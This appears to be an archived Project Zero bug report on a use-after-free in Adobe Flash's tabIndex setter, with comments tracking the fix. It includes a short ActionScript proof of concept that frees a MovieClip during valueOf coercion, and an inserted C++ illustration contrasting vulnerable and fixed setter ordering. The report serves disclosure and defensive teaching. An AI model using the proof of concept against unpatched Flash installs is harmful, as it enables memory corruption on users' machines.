AN-Master / google-security-research

Automatically exported from code.google.com/p/google-security-research

Adobe Flash: Use-after-free in tabIndex setter #381

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
There is a use-after-free issue in the tabIndex setter in both the Button and 
MovieClip class (this issue needs to be fixed in both places). If the tabIndex is 
set, and then the number parameter has valueOf defined, it is possible to jump 
into script and free the Button or MovieClip before the tabIndex is set.

A proof-of-concept is as follows:

    // Keep a reference to the timeline so the callback can reach it
    _global.mc = this;

    // A "number" whose valueOf() re-enters script while the setter coerces it
    var n = {valueOf: func};
    var test = this.createEmptyMovieClip("test", 1);
    test.tabIndex = n;

    function func() {
        trace("here");
        // Creating a new object at depth 1 replaces (frees) "test" mid-setter
        //_global.mc.createEmptyMovieClip("test2", 1);
        var t = _global.mc.createTextField("test2", 1, 0, 0, 10, 10);
        trace(t);
        t.removeTextField();
        trace("here 2");
        return 7;
    }

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 14 May 2015 at 6:53

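The ordering problem the report describes, shown in an added C++ example that is not Adobe's code and not the reporter's PoC: a toy scripting host resolves the setter's target first and then coerces the argument, so the argument's valueOf() callback can free the target before the write lands. Beside it is the safe ordering (coerce every argument before touching host objects, or hold a strong reference across the coercion). Stage, DisplayObject, ScriptValue and the result codes are all constructed for this illustration; the weak_ptr probe is instrumentation so the demo reports the dangling write instead of performing it.

```cpp
#include <algorithm>
#include <functional>
#include <memory>
#include <string>
#include <vector>

// Constructed stand-in for a scripted display object (Button/MovieClip).
struct DisplayObject {
    std::string name;
    int tabIndex = -1;
    explicit DisplayObject(std::string n) : name(std::move(n)) {}
};

// Constructed stand-in for a script value: a plain number, or an object
// whose valueOf() runs script when the host coerces it to a number.
struct ScriptValue {
    int number = 0;
    std::function<int()> valueOf;  // empty for a plain number
    int toNumber() const { return valueOf ? valueOf() : number; }
};

// The display list: sole owner of the objects, like the engine's scene graph.
struct Stage {
    std::vector<std::shared_ptr<DisplayObject>> children;

    std::shared_ptr<DisplayObject> create(const std::string& name) {
        children.push_back(std::make_shared<DisplayObject>(name));
        return children.back();
    }
    std::shared_ptr<DisplayObject> find(const std::string& name) const {
        for (const auto& c : children) if (c->name == name) return c;
        return nullptr;
    }
    void remove(const std::string& name) {
        children.erase(std::remove_if(children.begin(), children.end(),
            [&](const std::shared_ptr<DisplayObject>& c) { return c->name == name; }),
            children.end());
    }
};

enum class SetResult { Written, TargetMissing, WroteDangling };

// Vulnerable ordering: take a raw pointer to the target, then coerce the
// argument. Coercion re-enters script, which can free the target, and the
// final write would go through a dangling pointer. The weak_ptr is demo
// instrumentation only: it lets us report the dangling write instead of doing it.
SetResult setTabIndexVulnerable(Stage& stage, const std::string& name, const ScriptValue& v) {
    std::shared_ptr<DisplayObject> found = stage.find(name);
    if (!found) return SetResult::TargetMissing;
    DisplayObject* target = found.get();
    std::weak_ptr<DisplayObject> probe = found;
    found.reset();                      // the engine keeps only the raw pointer
    int n = v.toNumber();               // script runs here and may free *target
    if (probe.expired()) return SetResult::WroteDangling;  // real engine: UAF
    target->tabIndex = n;
    return SetResult::Written;
}

// Hardened ordering: coerce all arguments before touching host objects, then
// resolve the target. Holding a strong reference across the coercion is the
// other standard fix; either way nothing dangles when script re-enters.
SetResult setTabIndexFixed(Stage& stage, const std::string& name, const ScriptValue& v) {
    int n = v.toNumber();               // script may run; no host pointer is held
    std::shared_ptr<DisplayObject> target = stage.find(name);
    if (!target) return SetResult::TargetMissing;
    target->tabIndex = n;
    return SetResult::Written;
}

// Mirrors the report's PoC: valueOf() frees "test" while its tabIndex is being set
// (the PoC does this by creating another object at the same depth; here we remove it).
SetResult runPoc(bool fixed) {
    Stage stage;
    stage.create("test");
    ScriptValue n;
    n.valueOf = [&stage]() { stage.remove("test"); return 7; };
    return fixed ? setTabIndexFixed(stage, "test", n)
                 : setTabIndexVulnerable(stage, "test", n);
}

// A plain numeric argument still works through the hardened setter.
int runPlain() {
    Stage stage;
    std::shared_ptr<DisplayObject> obj = stage.create("test");
    ScriptValue three;
    three.number = 3;
    setTabIndexFixed(stage, "test", three);
    return obj->tabIndex;
}
```

The fixed setter does not try to detect the re-entrancy; it simply finishes all script-visible work before it holds any pointer into the host, so a callback that removes the object turns into a harmless "target missing" instead of a write into freed memory.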

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 15 May 2015 at 9:21

GoogleCodeExporter commented 8 years ago
This is PSIRT-3713

Original comment by natashe...@google.com on 18 May 2015 at 10:41

GoogleCodeExporter commented 8 years ago

Original comment by cev...@google.com on 5 Jul 2015 at 6:32

GoogleCodeExporter commented 8 years ago
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:37

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 3 Aug 2015 at 9:43